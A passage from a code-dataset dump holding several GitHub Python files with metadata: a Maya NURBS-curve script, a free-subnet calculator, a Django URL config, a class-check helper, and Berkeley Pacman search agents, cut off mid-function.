blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b01fa01765514bf343f4f068110fbd7cab8fa532 | 41fe349f67b9aac7ed41e2ccaf941f279379baa2 | /TESTFOLDER/Test.py | 8b1192a7f7db8e68509b3822c197587245477327 | [] | no_license | Jap3dWorks/MayaPy | 3cec086e3029530d5d959bef8499143423c0218c | f7bcfb8e4a3a6c359532ec3d272b127fee9f68cb | refs/heads/master | 2020-03-23T03:51:52.082178 | 2019-01-01T22:27:07 | 2019-01-01T22:27:07 | 141,053,154 | 5 | 5 | null | null | null | null | UTF-8 | Python | false | false | 4,051 | py | import maya.api.OpenMaya as OpenMaya
import maya.cmds as cmds
def curveCreateEP():
    """Create a NURBS curve through five hard-coded edit points and print
    its enclosed area.

    Side effects: creates a new 'transform' DAG node named 'curve' in the
    current Maya scene and prints the curve area (tolerance 1.0).
    NOTE: this module is Python 2 (uses print statements) and requires a
    running Maya session for maya.api.OpenMaya.
    """
    # NOTE(review): the active selection list is fetched but never used here.
    mselList = OpenMaya.MGlobal.getActiveSelectionList()
    mFndagObject = OpenMaya.MFnDagNode()
    # Parent transform node that will own the curve shape.
    dependNode = mFndagObject.create('transform', 'curve')
    # Edit points the curve must pass through.
    mPointArray = OpenMaya.MPointArray()
    mPointArray.append(OpenMaya.MPoint(0,0,0))
    mPointArray.append(OpenMaya.MPoint(10,0,0))
    mPointArray.append(OpenMaya.MPoint(20,10,0))
    mPointArray.append(OpenMaya.MPoint(20,20,0))
    mPointArray.append(OpenMaya.MPoint(20,30,0))
    mFnCurve = OpenMaya.MFnNurbsCurve()
    # Args after the point array: presumably degree=7 and form=open (1),
    # then 2D/rational/uniform flags and the parent node -- confirm against
    # the OpenMaya MFnNurbsCurve.createWithEditPoints documentation.
    mFnCurve.createWithEditPoints(mPointArray, 7, 1, False, False, False, dependNode)
    # get area
    area = mFnCurve.area(1.0)
    print area
def curveCreateCV(cv=((0,0,0), (5,0,0), (10,0,0), (20,10,5), (20,15,10), (20,20,15)), knots=((0.0), (0.0), (0.0), (3), (7), (10), (10), (10))):
    """
    Create a degree-3 NURBS curve from CVs and knots, move/rotate it, print
    some curve statistics, and snap the currently selected object to the
    curve's frame at parameter 5.0.
    Args:
        cv: Curve vertex positions (sequence of (x, y, z) tuples).
        knots: Knot vector for the curve. NOTE(review): the parenthesised
            defaults like (0.0) are plain numbers, not tuples -- this is a
            flat sequence of 8 knots for 6 CVs (degree 3: #knots = #CVs + 2).
    Side effects: creates scene nodes, prints to stdout, and repositions the
    first object in the active selection list.
    """
    mFndagObject = OpenMaya.MFnDagNode()
    dependNode = mFndagObject.create('transform', 'curve')
    # CV
    mPointArray = OpenMaya.MPointArray(cv)
    # knots
    KnotArray = OpenMaya.MDoubleArray(knots)
    # create curve (degree 3, open form) under the new transform
    mFnCurve = OpenMaya.MFnNurbsCurve()
    mFnCurve.create(mPointArray, KnotArray, 3, 1, False, False, dependNode)
    mfntransformCurve = OpenMaya.MFnTransform(dependNode)
    # Second arg is the MSpace constant -- presumably kWorld/kTransform; confirm.
    mfntransformCurve.setTranslation(OpenMaya.MVector(15, 15, 15), 2)
    mfntransformCurve.setRotation(OpenMaya.MEulerRotation(OpenMaya.MVector(15, 15, 15)), 1)
    # if mfn is not set with dag path, cant do world transforms
    curveDagpath = mfntransformCurve.getPath()
    mFnCurve.setObject(curveDagpath)
    print ('dag path: %s' % curveDagpath)
    # get area
    area = mFnCurve.area(1.0)
    print (area)
    # get length
    curveLenght = mFnCurve.length()
    print (curveLenght)
    # Build an orthonormal frame (tangent/normal/binormal) at parameter 5.0.
    middlePoint = mFnCurve.getPointAtParam(5.0, OpenMaya.MSpace.kWorld)
    middleNormal = mFnCurve.normal(5.0, OpenMaya.MSpace.kWorld)
    middleNormal.normalize()
    middleTangent = mFnCurve.tangent(5.0, OpenMaya.MSpace.kWorld)
    middleTangent.normalize()
    # '^' is MVector cross product in the OpenMaya API.
    middleBinormal = middleTangent ^ middleNormal
    middleBinormal.normalize()
    print(middleNormal, middleTangent, middleBinormal)
    # Snap the first selected object onto the curve frame.
    mselList = OpenMaya.MGlobal.getActiveSelectionList()
    mDagPath = mselList.getDagPath(0)
    # Row-major 4x4: rows are tangent / normal / binormal axes, last row is
    # the translation (the point on the curve).
    transformation = OpenMaya.MMatrix(((middleTangent.x, middleTangent.y, middleTangent.z, 0.0),
                                       (middleNormal.x, middleNormal.y, middleNormal.z, 0.0),
                                       (middleBinormal.x, middleBinormal.y, middleBinormal.z, 0.0),
                                       (middlePoint.x, middlePoint.y, middlePoint.z, 1)))
    mfnTransform = OpenMaya.MFnTransform(mDagPath)
    mfnTransform.setTransformation(OpenMaya.MTransformationMatrix(transformation))
    """
    # rotate vector a over vector b
    quaternion = OpenMaya.MQuaternion(OpenMaya.MVector(1,0,0), middleTangent)
    mfnTransform = OpenMaya.MFnTransform(mDagPath)
    mfnTransform.setRotation(quaternion, 1)
    mfnTransform.setTranslation(OpenMaya.MVector(middlePoint), 4)
    """
def getdestination(element, attribute):
    """Print connection info for a plug (and its elements) on a scene node.

    Args:
        element: name of a mesh node to look up in the scene.
        attribute: name of the plug to inspect on that node.
    Side effects: prints plug/element diagnostics to stdout (Python 2).
    """
    mselList = OpenMaya.MSelectionList()
    mselList.add(element)
    meshObj = mselList.getDependNode(0)
    mfnShape = OpenMaya.MFnMesh(meshObj)
    # True presumably requests the networked plug -- confirm with findPlug docs.
    mplug = mfnShape.findPlug(attribute, True)
    print mplug.name()
    print mplug.numChildren()
    print mplug.numConnectedChildren()
    print mplug.isConnected
    print mplug.numConnectedElements()
    print mplug.isElement
    print mplug.numElements()
    # Walk each array element of the plug and show what it is connected to.
    for i in range(mplug.evaluateNumElements()):
        mchild = mplug.elementByPhysicalIndex(i)
        print mchild.name()
        print mchild.numConnectedChildren()
        print mchild.isConnected
        # connectedTo(True, True): both source and destination connections.
        print mchild.connectedTo(True, True)[0].name()
        print mchild.isElement
# getdestination(element='polySurfaceShape3', attribute='instObjGroups') | [
"38395064+Jap3dWorks@users.noreply.github.com"
] | 38395064+Jap3dWorks@users.noreply.github.com |
b8e8df4165e5c68d730eab8b8fe69f808f78ca32 | bc08302533982d4a154f5615a2c8366f695234e5 | /work/tools/free_ip.py | 721bcc9f76e13c7c646d22000c17c96dd1e0352c | [] | no_license | rvfedorin/PythonDevelopment | bfd3cfb4ad22d72e2002d7430fa8821ea35717f6 | d6748189874b53b8357d5b3ff7d520ff0a93e15a | refs/heads/master | 2022-12-13T11:53:16.041737 | 2019-02-15T08:50:15 | 2019-02-15T08:50:15 | 122,050,190 | 0 | 0 | null | 2022-12-08T01:18:43 | 2018-02-19T10:57:37 | Python | UTF-8 | Python | false | false | 3,528 | py | def mark_used_ip(list_used_ip, list_all_ip):
for ip in list_all_ip:
if ip in list_used_ip:
position_ip = list_all_ip.index(ip)
list_all_ip[position_ip] = 'x'
def get_free_lan(list_ip_with_used):
    """Carve the largest possible free subnets out of a /24 worth of IPs.

    Args:
        list_ip_with_used: the 256 fourth-octet values of a /24, where every
            used address has been replaced by the marker 'x'.
    Returns:
        A list of strings 'first_octet/prefix' (e.g. '128/25') describing
        aligned, completely free blocks, largest blocks first.
    """
    found = []
    for prefix in range(25, 33):
        blocks = 2 ** (prefix - 24)          # aligned blocks of this size in a /24
        block_size = 2 ** (32 - prefix)      # addresses per block
        lo, hi = 0, block_size
        for _ in range(blocks):
            window = list_ip_with_used[lo:hi]
            if len(list_ip_with_used) >= hi and 'x' not in window:
                # Whole block is free: record it and drop its addresses so
                # smaller prefixes are only searched in what remains.
                found.append(f'{list_ip_with_used[lo]}/{prefix}')
                list_ip_with_used = [ip for ip in list_ip_with_used if ip not in window]
            else:
                lo += block_size
                hi += block_size
            if not list_ip_with_used:
                break
        if not list_ip_with_used:
            break
    return found
def get_only_fourth_octet(list_ip):
    """Split dotted-quad addresses into fourth octets and a /24 prefix.

    Args:
        list_ip: non-empty list of 'a.b.c.d' strings (assumed to share the
            same first three octets).
    Returns:
        (fourth_octets, prefix) where fourth_octets is a list of ints and
        prefix is 'a.b.c.' taken from the *last* address in the list.
    """
    octets = []
    for address in list_ip:
        parts = address.split('.')
        octets.append(int(parts[3]))
        prefix = f'{parts[0]}.{parts[1]}.{parts[2]}.'
    return octets, prefix
def get_all_ip_in_lan(list_lan):
    """Expand CIDR strings into the individual addresses they contain.

    Args:
        list_lan: list of 'a.b.c.d/mask' strings; blocks are assumed not to
            overflow the fourth octet (only that octet is incremented).
    Returns:
        A flat list of 'a.b.c.d' strings covering every address of every block.
    """
    expanded = []
    for cidr in list_lan:
        base, mask = cidr.split('/')
        parts = base.split('.')
        host_count = 2 ** (32 - int(mask))
        for offset in range(host_count):
            expanded.append(f'{parts[0]}.{parts[1]}.{parts[2]}.{int(parts[3]) + offset}')
    return expanded
if __name__ == '__main__':
    # Model the whole /24 as its 256 fourth-octet values (0..255).
    all_ip = []
    for i in range(256):
        all_ip.append(i)
    # Hard-coded inventory of already-allocated /29 and /30 blocks in
    # 172.30.86.0/24, expanded to individual addresses.
    x = (get_all_ip_in_lan(['172.30.86.164/30', '172.30.86.216/30', '172.30.86.152/30', '172.30.86.156/30',
                            '172.30.86.160/30', '172.30.86.144/30', '172.30.86.140/30', '172.30.86.136/30',
                            '172.30.86.120/30', '172.30.86.116/30', '172.30.86.88/30', '172.30.86.92/30',
                            '172.30.86.96/30', '172.30.86.80/30', '172.30.86.20/30', '172.30.86.184/30',
                            '172.30.86.196/30', '172.30.86.212/30', '172.30.86.220/30', '172.30.86.224/30',
                            '172.30.86.232/30', '172.30.86.236/30', '172.30.86.240/30', '172.30.86.248/30',
                            '172.30.86.252/30', '172.30.86.132/30', '172.30.86.44/30', '172.30.86.148/30',
                            '172.30.86.76/30', '172.30.86.48/30', '172.30.86.40/30', '172.30.86.84/30',
                            '172.30.86.36/30', '172.30.86.72/30', '172.30.86.104/30', '172.30.86.108/30',
                            '172.30.86.24/30', '172.30.86.228/30', '172.30.86.204/30', '172.30.86.0/30',
                            '172.30.86.4/30', '172.30.86.8/30', '172.30.86.12/30', '172.30.86.244/30',
                            '172.30.86.192/30', '172.30.86.124/30', '172.30.86.112/30', '172.30.86.60/30',
                            '172.30.86.208/30', '172.30.86.176/30', '172.30.86.68/30', '172.30.86.28/30',
                            '172.30.86.32/30', '172.30.86.56/30', '172.30.86.100/30', '172.30.86.168/29',
                            '172.30.86.200/30', '172.30.86.188/30', '172.30.86.180/30']))
    list_used_ip = x
    # Reduce the used addresses to fourth octets, mark them as 'x' in the
    # /24 model, then report the free aligned blocks as full CIDR strings.
    list_used_ip_octet, lan24 = get_only_fourth_octet(list_used_ip)
    mark_used_ip(list_used_ip_octet, all_ip)
    free = get_free_lan(all_ip)
    for i in free:
        print(f'{lan24}{i}')
| [
"35657347+rvfedorin@users.noreply.github.com"
] | 35657347+rvfedorin@users.noreply.github.com |
0ce7fa3ff54ced5a15f802f3250f417770921ea9 | d7242e07cc79aa7a5e32a376de7e5a9d5f294cf7 | /0x0A-python-inheritance/3-is_kind_of_class.py | 77732c7315bcdc022c31b2cff3f39467cbf04ddf | [] | no_license | Jfprado11/holbertonschool-higher_level_programming | 87d921290b43202cc8507d898444df9455138d0f | f277a5ecd4dd349d94d9a26542cf9eca23f92fad | refs/heads/main | 2023-07-28T20:30:24.632598 | 2021-09-22T21:32:32 | 2021-09-22T21:32:32 | 361,762,721 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 286 | py | #!/usr/bin/python3
"""
chekck if a object is a instance of
a class or if it is a intance inherited
"""
def is_kind_of_class(obj, a_class):
    """Return True if obj is an instance of a_class or of a subclass
    of a_class, otherwise False.

    Args:
        obj: any object to test.
        a_class: the class to test against.
    """
    # isinstance() already returns a bool and handles inheritance,
    # so the original if/else wrapper was redundant.
    return isinstance(obj, a_class)
| [
"jfpc11@misena.edu.co"
] | jfpc11@misena.edu.co |
783c15f25e45e4baa9ecf7d04d81cc4d15b25356 | b9633d8a7c61e63cdb76af9b32273485e680682b | /projecto/ventas/urls.py | 6c6b9c0ce9e7c0fa960834db47eb38d6ad6a4a9d | [] | no_license | AbrWin/paginaWeb | e5fca38154d9785dce15b7a5741d25290c1bdcd1 | 3a6f1143b64ae39bce4706447086e645758716ce | refs/heads/master | 2016-09-05T09:20:25.870500 | 2014-05-08T04:22:44 | 2014-05-08T04:22:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | from django.conf.urls.defaults import patterns, url
# URL routes for the 'ventas' (sales) app. Uses the string-based view lookup
# of patterns(), which resolves names relative to 'ventas.views'.
# NOTE(review): django.conf.urls.defaults / patterns() belong to very old
# Django versions (removed in 1.10) -- this file only works on that era.
urlpatterns = patterns('ventas.views',
    url(r'^add/producto/$','add_product_view', name='vista_addProducto'),
    url(r'^edit/producto/(?P<id_prod>.*)/$','edit_product_view', name='vista_edit_producto'),
)
"tidusxt@hotmail.com"
] | tidusxt@hotmail.com |
e4c0e92a5c5ae4d52e039b64627acae0a2c3b266 | 92f7ba5345401f0e87ff1e34cac70854dec9c0ef | /search/searchAgents.py | 6886f12a2fbe99782f98f443f92067878c7a5898 | [] | no_license | xiaojunch/cs188 | 4c1c7e1804ae0b1a4c0fef6b4acb618164e029a0 | a6c37365e07c4edf4c968ffabd4aa45f2113bfb7 | refs/heads/master | 2021-01-23T10:57:46.844385 | 2017-07-02T16:49:51 | 2017-07-02T16:49:51 | 93,114,294 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,437 | py | # searchAgents.py
# ---------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
"""
This file contains all of the agents that can be selected to control Pacman. To
select an agent, use the '-p' option when running pacman.py. Arguments can be
passed to your agent using '-a'. For example, to load a SearchAgent that uses
depth first search (dfs), run the following command:
> python pacman.py -p SearchAgent -a fn=depthFirstSearch
Commands to invoke other search strategies can be found in the project
description.
Please only change the parts of the file you are asked to. Look for the lines
that say
"*** YOUR CODE HERE ***"
The parts you fill in start about 3/4 of the way down. Follow the project
description for details.
Good luck and happy searching!
"""
from game import Directions
from game import Agent
from game import Actions
import util
import time
import search
def manDist(A, B):
    """Manhattan (L1) distance between 2-D points A and B."""
    dx = abs(A[0] - B[0])
    dy = abs(A[1] - B[1])
    return dx + dy
class GoWestAgent(Agent):
    "An agent that goes West until it can't."

    def getAction(self, state):
        """Return WEST while it is a legal Pacman action, otherwise STOP."""
        legal = state.getLegalPacmanActions()
        return Directions.WEST if Directions.WEST in legal else Directions.STOP
#######################################################
# This portion is written for you, but will only work #
# after you fill in parts of search.py #
#######################################################
class SearchAgent(Agent):
    """
    This very general search agent finds a path using a supplied search
    algorithm for a supplied search problem, then returns actions to follow that
    path.
    As a default, this agent runs DFS on a PositionSearchProblem to find
    location (1,1)
    Options for fn include:
    depthFirstSearch or dfs
    breadthFirstSearch or bfs
    Note: You should NOT change any code in SearchAgent

    NOTE(review): this module is Python 2 (`raise X, msg`, `func.func_code`,
    print statements elsewhere in the file).
    """

    def __init__(self, fn='depthFirstSearch', prob='PositionSearchProblem', heuristic='nullHeuristic'):
        # Warning: some advanced Python magic is employed below to find the right functions and problems
        # fn/prob/heuristic are *names*; they are resolved against search.py
        # and this module's globals at construction time.

        # Get the search function from the name and heuristic
        if fn not in dir(search):
            raise AttributeError, fn + ' is not a search function in search.py.'
        func = getattr(search, fn)
        # Pass a heuristic only if the search function declares a 'heuristic'
        # parameter (detected by inspecting its code object's variable names).
        if 'heuristic' not in func.func_code.co_varnames:
            print('[SearchAgent] using function ' + fn)
            self.searchFunction = func
        else:
            if heuristic in globals().keys():
                heur = globals()[heuristic]
            elif heuristic in dir(search):
                heur = getattr(search, heuristic)
            else:
                raise AttributeError, heuristic + ' is not a function in searchAgents.py or search.py.'
            print('[SearchAgent] using function %s and heuristic %s' % (fn, heuristic))
            # Note: this bit of Python trickery combines the search algorithm and the heuristic
            self.searchFunction = lambda x: func(x, heuristic=heur)

        # Get the search problem type from the name
        if prob not in globals().keys() or not prob.endswith('Problem'):
            raise AttributeError, prob + ' is not a search problem type in SearchAgents.py.'
        self.searchType = globals()[prob]
        print('[SearchAgent] using problem type ' + prob)

    def registerInitialState(self, state):
        """
        This is the first time that the agent sees the layout of the game
        board. Here, we choose a path to the goal. In this phase, the agent
        should compute the path to the goal and store it in a local variable.
        All of the work is done in this method!
        state: a GameState object (pacman.py)
        """
        if self.searchFunction == None: raise Exception, "No search function provided for SearchAgent"
        starttime = time.time()
        problem = self.searchType(state) # Makes a new search problem
        self.actions = self.searchFunction(problem) # Find a path
        totalCost = problem.getCostOfActions(self.actions)
        print('Path found with total cost of %d in %.1f seconds' % (totalCost, time.time() - starttime))
        if '_expanded' in dir(problem): print('Search nodes expanded: %d' % problem._expanded)

    def getAction(self, state):
        """
        Returns the next action in the path chosen earlier (in
        registerInitialState). Return Directions.STOP if there is no further
        action to take.
        state: a GameState object (pacman.py)
        """
        # Lazily initialize the cursor into the precomputed action list.
        if 'actionIndex' not in dir(self): self.actionIndex = 0
        i = self.actionIndex
        self.actionIndex += 1
        if i < len(self.actions):
            return self.actions[i]
        else:
            return Directions.STOP
class PositionSearchProblem(search.SearchProblem):
    """
    A search problem defines the state space, start state, goal test, successor
    function and cost function. This search problem can be used to find paths
    to a particular point on the pacman board.
    The state space consists of (x,y) positions in a pacman game.
    Note: this search problem is fully specified; you should NOT change it.
    """

    def __init__(self, gameState, costFn = lambda x: 1, goal=(1,1), start=None, warn=True, visualize=True):
        """
        Stores the start and goal.
        gameState: A GameState object (pacman.py)
        costFn: A function from a search state (tuple) to a non-negative number
        goal: A position in the gameState
        start: optional override of Pacman's current position
        warn: print a warning when the board is not a single-dot search maze
        visualize: highlight expanded cells in the graphical display
        """
        self.walls = gameState.getWalls()
        self.startState = gameState.getPacmanPosition()
        if start != None: self.startState = start
        self.goal = goal
        self.costFn = costFn
        self.visualize = visualize
        if warn and (gameState.getNumFood() != 1 or not gameState.hasFood(*goal)):
            print 'Warning: this does not look like a regular search maze'

        # For display purposes
        self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE

    def getStartState(self):
        return self.startState

    def isGoalState(self, state):
        isGoal = state == self.goal

        # For display purposes only
        if isGoal and self.visualize:
            self._visitedlist.append(state)
            import __main__
            if '_display' in dir(__main__):
                if 'drawExpandedCells' in dir(__main__._display): #@UndefinedVariable
                    __main__._display.drawExpandedCells(self._visitedlist) #@UndefinedVariable

        return isGoal

    def getSuccessors(self, state):
        """
        Returns successor states, the actions they require, and a cost of 1.
        As noted in search.py:
        For a given state, this should return a list of triples,
        (successor, action, stepCost), where 'successor' is a
        successor to the current state, 'action' is the action
        required to get there, and 'stepCost' is the incremental
        cost of expanding to that successor
        """
        successors = []
        for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
            x,y = state
            dx, dy = Actions.directionToVector(action)
            nextx, nexty = int(x + dx), int(y + dy)
            # A move is legal iff the destination cell is not a wall.
            if not self.walls[nextx][nexty]:
                nextState = (nextx, nexty)
                cost = self.costFn(nextState)
                successors.append( ( nextState, action, cost) )

        # Bookkeeping for display purposes
        self._expanded += 1 # DO NOT CHANGE
        if state not in self._visited:
            self._visited[state] = True
            self._visitedlist.append(state)

        return successors

    def getCostOfActions(self, actions):
        """
        Returns the cost of a particular sequence of actions. If those actions
        include an illegal move, return 999999.
        """
        if actions == None: return 999999
        x,y= self.getStartState()
        cost = 0
        for action in actions:
            # Check figure out the next state and see whether its' legal
            dx, dy = Actions.directionToVector(action)
            x, y = int(x + dx), int(y + dy)
            if self.walls[x][y]: return 999999
            cost += self.costFn((x,y))
        return cost
class StayEastSearchAgent(SearchAgent):
    """
    An agent for position search whose cost function penalizes positions on
    the West side of the board: stepping into (x, y) costs 1/2^x, so moving
    East is cheap and moving West is expensive under uniform-cost search.
    """

    def __init__(self):
        self.searchFunction = search.uniformCostSearch

        def costFn(pos):
            return .5 ** pos[0]

        self.searchType = lambda state: PositionSearchProblem(state, costFn, (1, 1), None, False)
class StayWestSearchAgent(SearchAgent):
    """
    An agent for position search whose cost function penalizes positions on
    the East side of the board: stepping into (x, y) costs 2^x, so moving
    West is cheap and moving East is expensive under uniform-cost search.
    """

    def __init__(self):
        self.searchFunction = search.uniformCostSearch

        def costFn(pos):
            return 2 ** pos[0]

        self.searchType = lambda state: PositionSearchProblem(state, costFn)
def manhattanHeuristic(position, problem, info={}):
    "The Manhattan distance heuristic for a PositionSearchProblem"
    dx = abs(position[0] - problem.goal[0])
    dy = abs(position[1] - problem.goal[1])
    return dx + dy
def euclideanHeuristic(position, problem, info={}):
    "The Euclidean distance heuristic for a PositionSearchProblem"
    dx = position[0] - problem.goal[0]
    dy = position[1] - problem.goal[1]
    return (dx ** 2 + dy ** 2) ** 0.5
#####################################################
# This portion is incomplete. Time to write code! #
#####################################################
class CornersProblem(search.SearchProblem):
    """
    This search problem finds paths through all four corners of a layout.
    You must select a suitable state space and successor function

    State representation chosen here: a two-element list
        [pacmanPosition, {corner: flag}]
    where flag is 0 until that corner has been visited, then 1.
    NOTE(review): list/dict states are unhashable -- presumably search.py
    never uses states as dict/set keys directly; confirm.
    """

    def __init__(self, startingGameState):
        """
        Stores the walls, pacman's starting position and corners.
        """
        self.walls = startingGameState.getWalls()
        self.startingPosition = startingGameState.getPacmanPosition()
        # The four corners sit one cell inside the outer wall ring.
        top, right = self.walls.height-2, self.walls.width-2
        self.corners = ((1,1), (1,top), (right, 1), (right, top))
        for corner in self.corners:
            if not startingGameState.hasFood(*corner):
                print 'Warning: no food in corner ' + str(corner)
        self._expanded = 0 # DO NOT CHANGE; Number of search nodes expanded
        # Please add any code here which you would like to use
        # in initializing the problem
        "*** YOUR CODE HERE ***"

    def getStartState(self):
        """
        Returns the start state (in your state space, not the full Pacman state
        space)
        """
        state = []
        state.append(self.startingPosition)
        cornerState = {}
        for corner in self.corners:
            cornerState[corner] = 0  # 0 == corner not yet visited
        state.append(cornerState)
        return state

    def isGoalState(self, state):
        """
        Returns whether this search state is a goal state of the problem.
        Returns 0/1 (truthy ints) rather than bools.
        """
        for corner in state[1]:
            if state[1][corner] == 0:
                return 0
        return 1

    def getSuccessors(self, state):
        """
        Returns successor states, the actions they require, and a cost of 1.
        As noted in search.py:
        For a given state, this should return a list of triples, (successor,
        action, stepCost), where 'successor' is a successor to the current
        state, 'action' is the action required to get there, and 'stepCost'
        is the incremental cost of expanding to that successor
        """
        successors = []
        for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
            # Add a successor state to the successor list if the action is legal
            # Here's a code snippet for figuring out whether a new position hits a wall:
            # x,y = currentPosition
            # dx, dy = Actions.directionToVector(action)
            # nextx, nexty = int(x + dx), int(y + dy)
            # hitsWall = self.walls[nextx][nexty]
            x,y = state[0]
            dx, dy = Actions.directionToVector(action)
            nextx, nexty = int(x+dx), int(y+dy)
            if not self.walls[nextx][nexty]:
                nextPosi = (nextx, nexty)
                # Copy the visited-corner map so sibling successors do not
                # share (and clobber) one another's state.
                nextCornerState = state[1].copy()
                if nextPosi in nextCornerState:
                    nextCornerState[nextPosi] = 1
                nextState = [nextPosi,nextCornerState]
                cost = 1
                successors.append( (nextState, action, cost) )
        self._expanded += 1 # DO NOT CHANGE
        return successors

    def getCostOfActions(self, actions):
        """
        Returns the cost of a particular sequence of actions. If those actions
        include an illegal move, return 999999. This is implemented for you.
        """
        if actions == None: return 999999
        x,y= self.startingPosition
        for action in actions:
            dx, dy = Actions.directionToVector(action)
            x, y = int(x + dx), int(y + dy)
            if self.walls[x][y]: return 999999
        return len(actions)
def cornersHeuristic(state, problem):
    """Admissible heuristic for CornersProblem.

    Returns the largest Manhattan distance from the current position to any
    corner that has not been visited yet, or 0 once every corner is visited.
    state: [position, {corner: visited-flag}] as produced by CornersProblem.
    """
    corners = problem.corners # These are the corner coordinates
    walls = problem.walls # These are the walls of the maze, as a Grid (game.py)

    pos = state[0]
    unvisited = [corner for corner in state[1] if state[1][corner] == 0]
    if not unvisited:
        return 0
    # Manhattan distance, inlined so this function is self-contained.
    distances = [abs(c[0] - pos[0]) + abs(c[1] - pos[1]) for c in unvisited]
    return max(distances)
class AStarCornersAgent(SearchAgent):
    # NOTE: original docstring said "FoodSearchProblem" -- this agent actually
    # runs A* with cornersHeuristic on a CornersProblem.
    "A SearchAgent for CornersProblem using A* and your cornersHeuristic"
    def __init__(self):
        self.searchFunction = lambda prob: search.aStarSearch(prob, cornersHeuristic)
        self.searchType = CornersProblem
class FoodSearchProblem:
    """
    A search problem associated with finding the a path that collects all of the
    food (dots) in a Pacman game.
    A search state in this problem is a tuple ( pacmanPosition, foodGrid ) where
    pacmanPosition: a tuple (x,y) of integers specifying Pacman's position
    foodGrid: a Grid (see game.py) of either True or False, specifying remaining food
    """
    def __init__(self, startingGameState):
        self.start = (startingGameState.getPacmanPosition(), startingGameState.getFood())
        self.walls = startingGameState.getWalls()
        self.startingGameState = startingGameState
        self._expanded = 0 # DO NOT CHANGE
        self.heuristicInfo = {} # A dictionary for the heuristic to store information

    def getStartState(self):
        return self.start

    def isGoalState(self, state):
        # Goal: no food left in the grid.
        return state[1].count() == 0

    def getSuccessors(self, state):
        "Returns successor states, the actions they require, and a cost of 1."
        successors = []
        self._expanded += 1 # DO NOT CHANGE
        for direction in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
            x,y = state[0]
            dx, dy = Actions.directionToVector(direction)
            nextx, nexty = int(x + dx), int(y + dy)
            if not self.walls[nextx][nexty]:
                # Copy the grid so successors don't share food state, and
                # eat the dot (if any) at the destination cell.
                nextFood = state[1].copy()
                nextFood[nextx][nexty] = False
                successors.append( ( ((nextx, nexty), nextFood), direction, 1) )
        return successors

    def getCostOfActions(self, actions):
        """Returns the cost of a particular sequence of actions. If those actions
        include an illegal move, return 999999"""
        x,y= self.getStartState()[0]
        cost = 0
        for action in actions:
            # figure out the next state and see whether it's legal
            dx, dy = Actions.directionToVector(action)
            x, y = int(x + dx), int(y + dy)
            if self.walls[x][y]:
                return 999999
            cost += 1
        return cost
class AStarFoodSearchAgent(SearchAgent):
    "A SearchAgent for FoodSearchProblem using A* and your foodHeuristic"

    def __init__(self):
        def astarWithFoodHeuristic(prob):
            return search.aStarSearch(prob, foodHeuristic)

        self.searchFunction = astarWithFoodHeuristic
        self.searchType = FoodSearchProblem
def foodHeuristic(state, problem):
    """Bounding-box heuristic for FoodSearchProblem.

    The state is a tuple (pacmanPosition, foodGrid) where foodGrid supports
    asList() yielding the remaining food coordinates.

    Estimate: with no food the answer is 0; with one dot it is the Manhattan
    distance to that dot; otherwise it is the perimeter-style bound
        (reach nearest edge of the food bounding box in x and y)
        + (bounding-box width) + (bounding-box height).
    problem is unused here (problem.heuristicInfo is available for caching).
    """
    position, foodGrid = state
    foods = foodGrid.asList()
    if not foods:
        return 0
    if len(foods) == 1:
        fx, fy = foods[0]
        return abs(position[0] - fx) + abs(position[1] - fy)
    # Bounding box of the remaining food, computed once.
    xs = [f[0] for f in foods]
    ys = [f[1] for f in foods]
    max_x, min_x = max(xs), min(xs)
    max_y, min_y = max(ys), min(ys)
    width = max_x - min_x
    height = max_y - min_y
    # Cheapest way to reach either extreme of the box along each axis.
    reach_x = min(abs(position[0] - max_x), abs(position[0] - min_x))
    reach_y = min(abs(position[1] - max_y), abs(position[1] - min_y))
    return reach_x + reach_y + width + height
def MinSpanTree(vertList):
    '''
    Prim's-style minimum spanning tree weight over the given vertices,
    using Manhattan distance as the edge weight.

    Args:
        vertList: list of (x, y) positions.
    Returns:
        Total weight of the MST, or 0 for fewer than two vertices.

    NOTE(review): this reaches into util.PriorityQueue internals
    (NoVisit.heap entries are assumed to be (priority, count, item) triples)
    and mutates the queue via update() while iterating its heap -- presumably
    safe with this util implementation, but confirm against util.py.
    '''
    import util
    import heapq
    # initialize the problem
    if len(vertList) < 2:
        return 0
    Visit = [vertList[0]]
    # Seed frontier: every other vertex keyed by distance to the first one.
    NoVisit = util.PriorityQueue()
    for vert in vertList[1:]:
        dist = manDist(vert,Visit[0])
        NoVisit.push(vert,dist)
    # loop till NoVisit is empty
    minDist = 0
    while not NoVisit.isEmpty():
        # Take the cheapest frontier vertex; its key is the MST edge weight.
        popEdge, _, popVert = heapq.heappop(NoVisit.heap)
        minDist = minDist + popEdge
        # Relax remaining frontier keys against the newly added vertex
        # (update() presumably only lowers priorities).
